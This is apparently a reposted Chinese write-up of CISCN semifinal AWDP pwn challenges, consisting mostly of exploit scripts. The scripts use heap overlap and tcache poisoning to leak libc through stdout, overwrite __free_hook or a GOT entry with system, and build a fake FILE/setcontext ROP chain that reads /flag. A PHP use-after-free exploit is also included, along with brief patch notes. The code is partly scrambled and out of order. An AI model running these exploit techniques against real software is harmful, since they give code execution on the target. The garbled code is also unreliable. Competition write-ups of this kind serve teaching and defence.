awdp-pwn/typo awdp-pwn/打字错误
break
没有show, 构造堆块 ub 和 tcache fd重叠, 后面1/16 概率,申请到_IO_2_1_stdout_-0x10
成功的情况下
最终脚本
attack = '10.10.1.113 28142'.replace(' ',':') def start(argv=[], *a, **kw): #context(log_level = 'debug') def add(idx,size): def rm(idx): def edit(idx,size,text): for i in range(100): ru('>> ') pay = b'x00' * 0xF0 rm(4) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF add(2,0x70) add(8,0xF0) rm(7) add(6,0xe0) pay = 0xF8 * '/' + '/bin/shx00' #gdb.attach(io,gdbscript=gdbscript) io.interactive() itr()from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
binary = './pwn'
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
elf = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)
gdbscript = '''
brva 0x001698
brva 0x01754
#continue
'''.format(**locals())
#import os
#os.systimport os
#io = remote(*attack.split(':'))
ru('>> ')
sl('1')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
ru('>> ')
sl('2')
ru(':')
sl(str(idx))
ru('>> ')
sl('3')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
ru(': ')
s(text)
io = start([])
add(0,0x80)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xe0)
add(7,0xe0)
sl('3')
ru(':')
sl('0')
ru(': ')
pay = b'A'* 0x90
pay += p64(0xFFFF)
s(pay)
ru(': ')
s('TEST')
pay += p64(0x100*4+0xF1)
edit(1,0x200,pay)
rm(3)
rm(2)
lss('stdout')
add(3,0x70)
try:
pay = b'x00' * 0x1f8
pay += p16(stdout + 0x2000)
edit(1,len(pay), pay)
add(9,0xF0)
pay = p64(0)
pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0)
edit(9,len(pay), pay)
io.recvuntil('x00'*8)
libc_base = uu64(r(8)) - 2017664
libc.address = libc_base
free_hook = libc.sym['__free_hook']
lss('libc_base')
pause()
rm(6)
pay = 0x4f8 * b'x00' + p64(free_hook - 0x10)
edit(1,len(pay), pay)
add(7,0xe0)
edit(7,0x40,p64(0)+p64(libc.sym['system']))
edit(1,len(pay), pay)
rm(2)
except:
io.close()
pass
fix
错误的传参,存在格式字符串漏洞 ,这里也会导致堆溢出
把原本的 snprintf 函数 nop 掉即可
awdp-pwn/prompt
break
protobuf,堆溢出漏洞
syntax = "proto3";
package mypackage;
message pwn2 {
int32 option = 1;
int32 chunk_sizes = 2;
int32 heap_chunks_id = 3;
bytes heap_content = 4;
}
// protoc --python_out=. pwn2.proto
◆exp
attack = ''.replace(' ',':') def start(argv=[], *a, **kw): #context(log_level = 'debug') import pwn2_pb2 # syntax = "proto3"; def add(size,text=b'123',idx=0): # 这里的堆块基本都是连续在一起的,后续溢出就方便很多 pay = b'A' * 0x108 + p64(0x110 * 4 +1) add(0x100, b'8') show(3) add(0x100, b'8') show(3) rm(2) add(0x100, b'7') # 模板orw 嗦 pay = flat({ gdb.attach(io,gdbscript) libc.address = libc_base orw_rop_addr = fake_IO_addr # ret to addr lss('libc_base') #pay = flat({ # libc.address = libc_basefrom pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
binary = './pwn'
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)
gdbscript = '''
brva 0x1DEC
brva 0x01BD6
#continue
'''.format(**locals())
#import os
#os.systimport os
#io = remote(*attack.split(':'))
io = start([])
# package mypackage;
# message pwn2 {
# int32 option = 1;
# int32 chunk_sizes = 2;
# int32 heap_chunks_id = 3;
# bytes heap_content = 4;
# }
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 1;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def rm(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 2;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def edit(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 3;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def show(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 4;
data.chunk_sizes = 1
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
add(0x100, b'1')
add(0x100, b'2')
add(0x100, b'3')
add(0x100, b'4')
add(0x100, b'5')
add(0x100, b'6')
add(0x100, b'7')
add(0x100, b'8')
edit(1,len(pay),pay)
rm(2)
ru(': ')
libc_base = uu64(r(6)) - 2169632
libc.address = libc_base
lss('libc_base')
rm(8)
ru(': ')
key = uu64(r(5))
heap_base = key << 0xC
pay = b'A' * 0x108 + p64(0x111)
pay += p64(key ^ libc.sym['_IO_2_1_stdout_'])
edit(1,len(pay),pay)
fake_IO_addr = libc.sym['_IO_2_1_stdout_']
0x00: ' sh;',
0x18: libc.sym['setcontext'] + 61,
0x20: fake_IO_addr, # 0x20 > 0x18
0x68: fake_IO_addr, # rdi #read fd
0x70: 0, # rsi #read buf
0x78: fake_IO_addr, # rsi2 #read buf
0x88: fake_IO_addr + 0x8, # rdx #read size
0x90: 0x400, # rdx2 #read size
0x98: 0x23, # rdx #read size
0xa0: fake_IO_addr,
0xa8: libc.sym['setcontext'] + 294, # RCE2 ogg
0xb0: libc.sym['read'], # RCE2 ogg
0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
0xe0: fake_IO_addr,
},filler=b'x00')
add(0x100, pay)
pause()
libc_rop = ROP(libc)
rax = libc_rop.find_gadget(['pop rax','ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]
m = 0
try:
rdx = libc_rop.find_gadget(['pop rdx','ret'])[0];m = 1
except:
rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]; m = 2
syscall = libc_rop.find_gadget(['syscall','ret'])[0]
buf = orw_rop_addr + 0xa0 + m*3*8
orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(buf) + p64(rsi) + p64(0) + p64(rdx) + p64(0)*m + p64(syscall)
orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['read'])
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['write'])
orw_rop += b'/flag'.ljust(0x10,b'x00')
sl(orw_rop)
lss('key')
lss('heap_base')
#},filler=b'x00')
# system = libc.sym['system']
# bin_sh = next(libc.search(b'/bin/sh'))
itr()
fix
堆块大小改大
awdp-pwn/php-master
break
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
allocate(2, 0x40);
allocate(3, 0x40);
overwrite(0,str_repeat("A",0x40));
overwrite(1,str_repeat("B",0x40));
overwrite(2,str_repeat("C",0x40));
overwrite(3,str_repeat("D",0x40));
free 后,指针还是存在的 应该存在UAF 漏洞
clear() 后 仍然可以对堆块操作,修改链表即可 任意地址申请
◆exploit
function u64($leak){ function p64($addr){ function leakaddr($buffer){ function leak(){ ob_start("leakaddr"); leak(); $free_got = $module_base + 0x4060; ?><?php
$heap_base = 0;
$libc_base = 0;
$libc = "";
$mbase = "";
$leak = strrev($leak);
$leak = bin2hex($leak);
$leak = hexdec($leak);
return $leak;
}
$addr = dechex($addr);
$addr = hex2bin($addr);
$addr = strrev($addr);
$addr = str_pad($addr, 8, "x00");
return $addr;
}
global $libc,$mbase;
//$p = '/([0-9a-f]+)-[0-9a-f]+ .* /usr/lib/x86_64-linux-gnu/libc.so.6/';
$p = '/([0-9a-f]+)-[0-9a-f]+ .* /lib/x86_64-linux-gnu/libc-2.28.so/';
$p1 = '/([0-9a-f]+)-[0-9a-f]+ .* /usr/local/lib/php/extensions/no-debug-non-zts-20210902/vuln.so/';
preg_match_all($p, $buffer, $libc);
preg_match_all($p1, $buffer, $mbase);
}
global $libc_base, $module_base, $libc, $mbase;
include("/proc/self/maps");
$buffer = ob_get_contents();
ob_end_flush();
leakaddr($buffer);
$libc_base=hexdec($libc[1][0]);
$module_base=hexdec($mbase[1][0]);
echo dechex($libc_base);
echo "n";
echo dechex($module_base);
echo "n";
}
$system = $libc_base + 0x44af0;
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
allocate(2, 0x40);
clear();
overwrite(1, p64($free_got));
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
overwrite(0, "/readflag>/var/www/html/flagx00");
overwrite(1, p64($system));
clear();
◆调试窗口
gdb -ex "target remote 172.17.0.2:1234"
◆docker 里面 启动gdbserver,(把本地的gdbserver 传到docker 里面)
root@c723767b2eff:/var/www/html/gdbserver# ls
exp.php gdbserver ld-linux-x86-64.so.2 libc.so.6 libgcc_s.so.1 libm.so.6 libstdc++.so.6
root@c723767b2eff:/var/www/html/gdbserver# ldd gdbserver
./gdbserver: /lib64/ld-linux-x86-64.so.2: version `GLIBC_2.35' not found (required by ./libc.so.6)
linux-vdso.so.1 (0x000074b743b0d000)
libstdc++.so.6 => ./libstdc++.so.6 (0x000074b743834000)
libgcc_s.so.1 => ./libgcc_s.so.1 (0x000074b743804000)
libc.so.6 => ./libc.so.6 (0x000074b7435e4000)
libm.so.6 => ./libm.so.6 (0x000074b7434f1000)
./ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x000074b743b0f000)
root@c723767b2eff:/var/www/html/gdbserver# ./gdbserver :1234 php -S 0:8080 exp.php
gdbserver: Error disabling address space randomization: Operation not permitted
Process php created; pid = 90
Listening on port 1234
◆运行 ee.sh
docker cp exp.php c72:/var/www/html/gdbserver/ # exp.php 传到 docker 里面
curl http://172.17.0.2:8080/exp.php # 然后访问触发
fix
把 申请的堆块大小固定成一个 大的size
awdp-pwn/post_quantum
break
不看
fix
idx 改小
看雪ID:imLZH1 https://bbs.kanxue.com/user-home-987517.htm
# 往期推荐
球分享
原文始发于微信公众号(看雪学苑):CCB_CISCN_半决赛-AWDP-pwn 题解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论